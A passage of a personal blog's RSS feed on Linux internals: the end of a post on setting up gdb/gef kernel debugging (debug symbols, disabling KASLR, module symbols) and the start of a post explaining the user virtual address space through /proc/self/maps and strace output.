<li>If you&apos;re building from source, just include <code>CONFIG_DEBUG_INFO=y</code> and optionally <code>CONFIG_GDB_SCRIPTS=y</code> and you&apos;ll find your vmlinux with debug symbols in your build root (see <a href="compiling/README.md">compiling/README.md</a> for more info on building)
<ul>
<li><code>./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS</code> will enable these in your config with minimal fiddling</li>
</ul>
</li>
<li>If you&apos;re running a distro kernel, you can check your distro&apos;s repositories to see if you can pull debug symbols
<ul>
<li>On Ubuntu, if you update your sources and keyring <a href="https://wiki.ubuntu.com/Debug%20Symbol%20Packages">[1]</a>, you can pull the debug symbols by running <code>$ sudo apt-get install linux-image-$(uname -r)-dbgsym</code> and should find your <code>vmlinux</code> @ <code>/usr/lib/debug/boot/vmlinux-$(uname-r)</code></li>
</ul>
</li>
</ul>
<!--kg-card-end: markdown--><p>And just like that, we&apos;re done! jk, there&apos;s one more common gotcha (that I always forget) and that&apos;s KASLR: Kernel Address Space Layout Randomization. As it sounds, this randomizes where the kernel image is loaded into memory at boot time; so the address gdb reads from the vmlinux will naturally be wrong... </p><ul><li>You can either add <code>nokaslr</code> to your boot options, typically via grub menu at boot</li><li>Or by editing <code>/etc/default/grub</code> and including <code>nokaslr</code> in <code>GRUB_CMDLINE_LINUX_DEFAULT</code></li></ul><p>After that we really are ready, and can repeat the steps from before, remember to also load our <code>vmlinux</code> with gdb:</p><pre><code class="language-sh">$ gdb vmlinux
...
gef&#x27A4;  target remote :12345 
... 
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; threads &#x2500;&#x2500;&#x2500;&#x2500;
[#0] Id 1, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#1] Id 2, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#2] Id 3, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#3] Id 4, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; trace &#x2500;&#x2500;&#x2500;&#x2500;
[#0] 0xffffffff81c3f9fe &#x2192; native_safe_halt()
[#1] 0xffffffff81c3fc4d &#x2192; arch_safe_halt()
[#2] 0xffffffff81c3fc4d &#x2192; acpi_safe_halt()
[#3] 0xffffffff81c3fc4d &#x2192; acpi_idle_do_entry(cx=0xffff88810187d864)
[#4] 0xffffffff816e4201 &#x2192; acpi_idle_enter(dev=&lt;optimized out&gt;, drv=&lt;optimized out&gt;, index=&lt;optimized out&gt;)
[#5] 0xffffffff8198e56d &#x2192; cpuidle_enter_state(dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;, index=0x1)
[#6] 0xffffffff8198e88e &#x2192; cpuidle_enter(drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;, dev=0xffff888105a61c00, index=0x1)
[#7] 0xffffffff810e7fa2 &#x2192; call_cpuidle(next_state=0x1, dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;)
[#8] 0xffffffff810e7fa2 &#x2192; cpuidle_idle_call()
[#9] 0xffffffff810e80c3 &#x2192; do_idle()
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;
gef&#x27A4;  
</code></pre><p>Awesome! Now gdb knows exactly where we our, and gef provides us lots of useful information in it&apos;s <code>ctx</code> menu, which you can always pop up with the <code>ctx</code> command.</p><p>I&apos;ve cut it off for brevity but we can at a glance see sections (might need to scroll right for the headings) for registers, stack, code, threads and trace! </p><p>On top of that, as I&apos;ll touch on in <strong>Misc GDB Tips </strong>below, we&apos;re able to explore all the kernel structures and more thanks to the symbols we now have.</p><h4 id="loadable-modules">Loadable Modules</h4><p>As a quick aside, you might find out that some symbols for certain modules are missing, despite doing all that <code>vmlinux</code> faff above. This is because not all modules are compiled into the kernel, some are compiled as loadable modules.</p><p>This means that the modules are only loaded into memory when they&apos;re needed, e.g. via <code>modprobe</code>. We can check if a module is loaded in our <code>.config</code>:</p><ul><li><code>CONFIG_YOUR_MODULE=y</code> defines an in-kernel module</li><li><code>CONFIG_YOUR_MODULE=m</code> defines a loadable kernel module</li></ul><p>For loadable modules, we need to do a couple of extra steps, <strong>in addition to those above</strong>, in order to let gdb know about these symbols:</p><ul><li>Copy the module&apos;s <code>your_module.ko</code> from your debugging target; try <code>/lib/modules/$(uname -r)/kernel/</code></li><li>On your debugging target, find out the base address of the module; try <code>sudo grep -e &quot;^your_module&quot; /proc/modules</code></li><li>In your gdb session, you can now load in the module by <code>(gdb) add-symbol-file your_module.ko 0xAddressFromProc</code> - voila!</li></ul><p>Sorted! Now the symbols from <code>your_module</code> should be available in gdb! Just remember that even with KASLR disabled, this address can be different each time you load the module, but you only need to grab the <code>your_module.ko</code> &#xA0;once at least.</p><h4 id="misc-gdb-tips">Misc GDB Tips</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/whathaveidone.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="500" height="212"></figure><p>Oof, well this post is already careening towards 4000 words (and I did this voluntarily, for fun?!), so I think I&apos;ll just link to my repository where you can find some useful gdb/gef commands for debugging the Linux kernel!</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#useful-gdb-commands"><div class="kg-bookmark-content"><div class="kg-bookmark-title">linux-kernel-resources/debugging at main &#xB7; sam4k/linux-kernel-resources</div><div class="kg-bookmark-description">Curated collection of resources, examples and scripts for Linux kernel devs, researchers and hobbyists. - linux-kernel-resources/debugging at main &#xB7; sam4k/linux-kernel-resources</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">sam4k</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/d0c9155bd817a370c31ae92cb655510b1e99c985f42cb4243223386cf352a05f/sam4k/linux-kernel-resources" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"></div></a></figure><h4 id="other-stuff">Other Stuff</h4><p>As we&apos;re transitioning into a speedrun, congratulations to anyone who read the whole thing, I&apos;ll attempt to quickly touch on some other useful debugging resources:</p><ul><li><a href="https://github.com/osandov/drgn">drgn</a>: remember earlier, when I said debugging the kernel your using can be tricky? Well drgn is an extremely programmable debugger, written in python (and not 36 years ago), that among other things allows you to do live introspection on your kernel. I still need to explore this more, but I wouldn&apos;t see it as a replacement for gdb for example, but a different tool for different goals.</li><li><strong>strace</strong>: ah yes, our old friend, strace(1). The system call tracing utility can be useful for complimenting your kernel debugging by tracing the interactions between your poc/userland interface/program and the kernel. With minimal faff you can hone in on what kernel functions you may want to focus your debugging endeavours on.</li><li><strong>procfs</strong>: another reminder about the various introspection available via <code>/proc/</code>; you saw earlier that we made use of <code>/proc/modules</code>. There&apos;s plenty to explore here.</li><li><strong>man pages</strong>: don&apos;t sleep on the man pages! Although there isn&apos;t generally pages on kernel internals, the syscall section <code>(2)</code> can help with understanding some of the interactions that go on</li><li><strong>source</strong>: due to word count concerns, oops, and the fact I never really use it, I haven&apos;t included adding source into gdb but that doesn&apos;t mean you can&apos;t have it up for reference! I always try to have a copy of source handy to explore, not to mention the documentation that&apos;s usually available somewhere in the kernel too</li></ul><hr><ol><li><a href="https://www.sourceware.org/gdb/">https://www.sourceware.org/gdb/</a></li><li><a href="https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html">https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html</a></li><li>Future post idea? Dive into some debugging internals</li><li><a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm">https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm</a></li><li>If your guest is a different architecture to your host, gdb needs to needs to know about it, so you&apos;ll need to install and use <code>gdb-multiarch</code> &#xA0;</li></ol><h2 id="faq">FAQ</h2><p>So this is a little bit of an experiment, and maybe more suited to the GitHub repo, but if anyone has any questions feel free to <a href="https://twitter.com/sam4k1">@ me on Twitter</a> and I&apos;ll keep try keep this FAQ updated. Also, if anyone has any suggestions for FAQs, I&apos;m happy to add those too :)</p><h2 id="postamble">Postamble</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/didwemakeit.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="480" height="270"></figure><p>Talk about feature creep, eh? We certainly covered a lot of ground in this post: from building the kernel to patching modules to setting up our debugging environment.</p><p>Hopefully some of this (or all!) have been useful, and maybe helped demystify things. As I briefly mentioned in the intro, I&apos;ve included all the essentials in a <a href="https://github.com/sam4k/linux-kernel-resources">github repository</a>, which I&apos;ll continue to update with any useful Linux kernel resources/demos/shenanigans. </p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/sam4k/linux-kernel-resources"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - sam4k/linux-kernel-resources: Curated collection of resources, examples and scripts for Linux kernel devs, researchers and hobbyists.</div><div class="kg-bookmark-description">Curated collection of resources, examples and scripts for Linux kernel devs, researchers and hobbyists. - GitHub - sam4k/linux-kernel-resources: Curated collection of resources, examples and script...</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">sam4k</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/d0c9155bd817a370c31ae92cb655510b1e99c985f42cb4243223386cf352a05f/sam4k/linux-kernel-resources" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"></div></a></figure><p>I think by nature of the work we do, as programmers and &quot;hackers&quot;, a lot of times we find ourselves creating hacky solutions and shortcuts, then through some twisted process of natural selection some of these make their way into our workflow.</p><p>Though, perhaps because we consider them too niche or too messy, we often don&apos;t share these solutions or quick tricks and so the cycle continues. Is this necessarily a bad thing? Of course not! I love to tinker and believe me, I have many a bash script that should never see the light of day, but perhaps there&apos;s also a few that would help others if they did.</p><p>So really, this post is just a culmination of my own hacky, messy natural selection that has occurred during my time working on kernel stuff, so don&apos;t @ me if it&apos;s horribly wrong (DM me instead, pls help me), but hopefully there&apos;s some takeaways here that will inspire others to tinker and perhaps save some time in the process.</p><p><em><strong>Obligatory <a href="https://twitter.com/sam4k1">@ me</a> for any suggestions, corrections or questions!</strong></em></p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Linternals: The User Virtual Address Space]]></title><description><![CDATA[We continue our journey to understand virtual memory in Linux, as we take a closer look at the user virtual address space.]]></description><link>https://sam4k.com/linternals-virtual-memory-0x02/</link><guid isPermaLink="false">61e3402b7742d008b38dce20</guid><category><![CDATA[linternals]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Sun, 20 Mar 2022 19:00:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/02/linternals.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/02/linternals.gif" alt="Linternals: The User Virtual Address Space"><p>Ready to get dive back into some Linternals? I hope so! So to recap, <a href="https://sam4k.com/linternals-virtual-memory-part-1/">last time</a>, we covered some virtual memory fundamentals including:</p><ul><li>Virtual vs physical memory</li><li>The virtual address space</li><li>The VM split (user and kernel virtual address spaces)</li></ul><p>This time we&apos;re going to zoom in and focus on the two parts of the virtual memory split, taking a look at the user and kernel virtual address spaces.</p><p>Hopefully, after that, we&apos;ll have a good idea of how - and why - our Linux system uses virtual memory. At which point we&apos;ll take a look at how this is all implemented behind the scenes, examining some kernel and hardware specifics!</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#0x04-user-virtual-address-space">0x04 User Virtual Address Space</a>
<ul>
<li><a href="#userspace-mappings">Userspace Mappings</a></li>
<li><a href="#the-setup">The Setup</a>
<ul>
<li>brk()</li>
<li>mmap()</li>
<li>mprotect()</li>
<li>execve()</li>
</ul>
</li>
<li><a href="#threads">Threads</a></li>
<li><a href="#aslr">ASLR</a></li>
<li><a href="#wrapping-up-in-uvas">Wrapping Up In UVAS</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="0x04-user-virtual-address-space">0x04 User Virtual Address Space</h2><p>Alrighty then, first things first, let&apos;s actually take a look at what a typical process actually uses the user virtual address space (UVAS) for. Luckily, I don&apos;t have to whip up a diagram for this, as we can use the <code>/proc</code> filesystem!</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2753;</div><div class="kg-callout-text">procfs is a virtual filesystem that is created at boot. It acts as an interface to internal data structures in the kernel. It can be used to obtain information about the system and to change certain kernel parameters at runtime (sysctl). <sup>[1]</sup></div></div><p>Inside procfs, you can inspect running processes by PID. For example, the file <code>/proc/854/maps</code> will contain information about the mappings for process with PID 854. </p><p>To make life easier, there&apos;s a handy link, <code>/proc/self/</code>, which will point to the process currently reading the file - pretty neat! Beyond <code>maps</code>, there&apos;s all sorts of information we can learn from procfs; check <code>man procfs</code> for more info. </p><hr><ol><li><a href="https://www.kernel.org/doc/html/latest/filesystems/proc.html">https://www.kernel.org/doc/html/latest/filesystems/proc.html</a></li></ol><h3 id="userspace-mappings">Userspace Mappings</h3><p>Back on topic! Let&apos;s use the procfs to take a closer look at what our UVAS is being used for. From the man page, we learn the <code>maps</code> procfs file contains &quot;the currently mapped memory regions and their access permissions&quot;m for a process.</p><p>We&apos;ll touch more on the implementation later, but for now it&apos;s worth remembering that the virtual address space is <strong>vast</strong> and largely empty. If a process needs to use some memory, either to load the contents of a file or to store data, it will ask the kernel to map that memory appropriately. Now that virtual address is actually pointing to something.</p><p>Using the <code>self</code> link we talked about earlier, and the <code>maps</code> file, we can use <code>cat</code> to output the details of it&apos;s own memory mappings:</p><!--kg-card-begin: markdown--><pre><code class="language-console">$ cat /proc/self/maps 
5577277d1000-5577277d3000 r--p 00000000 00:19 868257                     /usr/bin/cat
5577277d3000-5577277d8000 r-xp 00002000 00:19 868257                     /usr/bin/cat
5577277d8000-5577277db000 r--p 00007000 00:19 868257                     /usr/bin/cat
5577277db000-5577277dc000 r--p 00009000 00:19 868257                     /usr/bin/cat
5577277dc000-5577277dd000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
557728bca000-557728beb000 rw-p 00000000 00:00 0                          [heap]
7fc863779000-7fc863a63000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
7fc863a63000-7fc863a66000 rw-p 00000000 00:00 0 
7fc863a66000-7fc863a92000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
7fc863a92000-7fc863c08000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c08000-7fc863c5c000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c5c000-7fc863c5d000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c5d000-7fc863c60000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c60000-7fc863c63000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c63000-7fc863c72000 rw-p 00000000 00:00 0 
7fc863c7e000-7fc863ca0000 rw-p 00000000 00:00 0 
7fc863ca0000-7fc863ca2000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863ca2000-7fc863cc9000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cc9000-7fc863cd4000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cd5000-7fc863cd7000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cd7000-7fc863cd9000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7ffddc9a0000-7ffddc9c1000 rw-p 00000000 00:00 0                          [stack]
7ffddc9f4000-7ffddc9f8000 r--p 00000000 00:00 0                          [vvar]
7ffddc9f8000-7ffddc9fa000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
</code></pre>
<!--kg-card-end: markdown--><p>Sweet! Well, there&apos;s a lot to unpack here, though some of it should look familiar. Consulting <code>man procfs</code> we can see the columns are as follows:</p><p><code>(virtual) address, &#xA0; perms, &#xA0; offset, &#xA0; dev, &#xA0; inode, &#xA0; pathname</code><br></p><p>If we recall from last time, on a typical x86_64 setup like mine, the most significant 16 bits (MSB 16) of userspace virtual addresses are 0 and 1 for kernel virtual addresses. </p><p>This means we can normally spot kernel addresses at a glance as they begin <code>0xffff....</code> while userspace addresses begin with <code>0x0000...</code> and are as a result typically shorter.</p><p>Anyway, before we scroll too far away from the code block (oops), let&apos;s unpack some of these lines of output shall we?</p><ul><li><strong>Lines 2-6</strong>: here we can see the mappings for the binary being run, found at <code>/usr/bin/cat</code>. Why is there multiple mappings for one binary file? Typically programs are made up of multiple sections, with differing perms. The .text section where the code is? We&apos;ll want that readable &amp; executable. Some portions of data, like our static consts want to be read only (.rodata), while mutable data wants to be readable and writable (.data) <sup>[1]</sup></li><li><strong>Line 7:</strong> procfs uses the pseudo-path <code>[heap]</code> to describe the mapping for the heap (no surprise there); a dynamic memory pool</li><li><strong>Lines 8,10-15:</strong> next up we can see several shared libraries being mapped into memory, for the program to use. We can see locale information and libc; again these may be split up into multiple mappings as touched on a moment ago <sup>[2]</sup></li><li><strong>Lines 9,16,17:</strong> these weird mappings with no pathname, are called <strong>anonymous mappings </strong>and are not backed by any file. This is essentially a blank memory region that a userspace process can use at it&apos;s discretion. Examples of anonymous mappings include both the stack and the heap <sup>[3]</sup></li><li><strong>Lines 18-22:</strong> <code>ld.so</code> is the dynamic linker that is invoked anytime we run a dynamically linked program (a quick check of <code>file /usr/bin/cat</code> will confirm this is indeed a dynamically linked program!)</li><li><strong>Line 23:</strong> another pseudo-path, <code>[stack]</code> is the mapping for our process&apos;s stack space</li><li><strong>Line 25:</strong> The &quot;virtual dynamic shared object&quot; (or vDSO) is a small shared library exported by the kernel to accelerate the execution of certain system calls that do not necessarily have to run in kernel space <sup>[5]</sup> </li><li><strong>Line 24:</strong> The <code>vvar</code> is a special page mapped into memory in order to store a &quot;mirror&quot; of kernel variables required by the virtual syscalls exported by the kernel</li><li><strong>Line 26:</strong> The <code>vsyscall</code> mapping is actually defunct; it was a legacy mapping that actually provided an executable mapping of kernel code for specific syscalls that didn&apos;t require elevated privileges and hence the whole user &#xA0;-&gt; kernel mode context switch. Suffice to say it&apos;s defunct now, and calls to vsyscall table still work for compatible, but now actually trap and act as a normal syscall <sup>[6]</sup></li></ul><p>And just like that we&apos;ve pieced together the various userspace (and some kernel stuff) mappings for an everyday program like <code>cat</code>! Pretty neat. In addition we&apos;ve dived into some of the tools the kernel provides us to examine this information.</p><hr><ol><li>For more information on the different sections of our binary, we can cross-reference the <code>offset</code> information we get from <code>/proc/self/maps</code> with the ELF section headers using <code>objdump -h /usr/bin/cat</code></li><li><code>ldd</code> lets us print the shared libraries required by a program, we can explore this more by checking out <code>ldd /usr/bin/cat</code>, though for reasons out of scope for this talk, it won&apos;t look identically to our <code>maps</code> output</li><li>If we want to get ahead of ourselves, <code>man 2 mmap</code> <sup>[4]</sup> describes the system call userspace programs use to ask the kernel to map regions of memory</li><li>The <code>2</code> in <code>man 2 mmap</code> says we want to look at man section 2, for syscalls, and not section 3 for lib functions. <code>man -k mmap</code> lets us search all the sections for references to <code>mmap</code></li><li><a href="https://lwn.net/Articles/615809/">Implementing virtual system calls @ LWN</a> </li><li>As expected, we can see the vsycall adress is located within the kernel half of the virtual address space, by the leading <code>0xffff...</code></li></ol><h3 id="the-setup">The Setup</h3><p>I think I&apos;m going to cover kernel and hardware side of things in coming sections, but I think it&apos;s worth touching on how we go from running <code>cat /proc/self/maps</code> to the memory mapping we saw above.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/how_that_happeen.gif" class="kg-image" alt="Linternals: The User Virtual Address Space" loading="lazy" width="476" height="254"></figure><p>In the last part we mentioned that system calls act as the fundamental interface between userspace applications and the kernel. If an unprivileged userspace process needs to do a privileged action (e.g. map some memory), it can use the syscall interface to ask the kernel to carry out this action on it&apos;s behalf <sup>[1]</sup>.</p><p>Now that we know what&apos;s being mapped, let&apos;s have a closer look on how, by revisiting <code>strace</code>. <code>strace</code> simply traces the system calls and signals made by a program. As we know memory mapping is handled by the kernel and system calls are how programs get the kernel to do this, <code>strace</code> seems like a good bet!</p><pre><code class="language-console">$ strace cat /proc/self/maps
execve(&quot;/usr/bin/cat&quot;, [&quot;cat&quot;, &quot;/proc/self/maps&quot;], 0x7fff3a014fd8 /* 61 vars */) = 0
brk(NULL)                               = 0x5622ee613000
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffe5d536650) = -1 EINVAL (Invalid argument)
access(&quot;/etc/ld.so.preload&quot;, R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, &quot;/etc/ld.so.cache&quot;, O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, &quot;&quot;, {st_mode=S_IFREG|0644, st_size=185283, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 185283, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa129bcd000
close(3)                                = 0
openat(AT_FDCWD, &quot;/usr/lib/libc.so.6&quot;, O_RDONLY|O_CLOEXEC) = 3
read(3, &quot;\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0&gt;\0\1\0\0\0\320\324\2\0\0\0\0\0&quot;..., 832) = 832
pread64(3, &quot;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&quot;..., 784, 64) = 784
pread64(3, &quot;\4\0\0\0@\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0&quot;..., 80, 848) = 80
pread64(3, &quot;\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\205vn\235\204X\261n\234|\346\340|q,\2&quot;..., 68, 928) = 68
newfstatat(3, &quot;&quot;, {st_mode=S_IFREG|0755, st_size=2463384, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bcb000
pread64(3, &quot;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&quot;..., 784, 64) = 784
mmap(NULL, 2136752, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fa1299c1000
mprotect(0x7fa1299ed000, 1880064, PROT_NONE) = 0
mmap(0x7fa1299ed000, 1531904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2c000) = 0x7fa1299ed000
mmap(0x7fa129b63000, 344064, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a2000) = 0x7fa129b63000
mmap(0x7fa129bb8000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1f6000) = 0x7fa129bb8000
mmap(0x7fa129bbe000, 51888, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fa129bbe000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa1299be000
arch_prctl(ARCH_SET_FS, 0x7fa1299be740) = 0
set_tid_address(0x7fa1299bea10)         = 28003
set_robust_list(0x7fa1299bea20, 24)     = 0
rseq(0x7fa1299bf0e0, 0x20, 0, 0x53053053) = 0
mprotect(0x7fa129bb8000, 12288, PROT_READ) = 0
mprotect(0x5622ec6d3000, 4096, PROT_READ) = 0
mprotect(0x7fa129c30000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7fa129bcd000, 185283)          = 0
getrandom(&quot;\x62\xf6\x2b\x64\xd3\x81\xee\x98&quot;, 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x5622ee613000
brk(0x5622ee634000)                     = 0x5622ee634000
openat(AT_FDCWD, &quot;/usr/lib/locale/locale-archive&quot;, O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, &quot;&quot;, {st_mode=S_IFREG|0644, st_size=3053472, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 3053472, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa1296d4000
close(3)                                = 0
newfstatat(1, &quot;&quot;, {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x1), ...}, AT_EMPTY_PATH) = 0
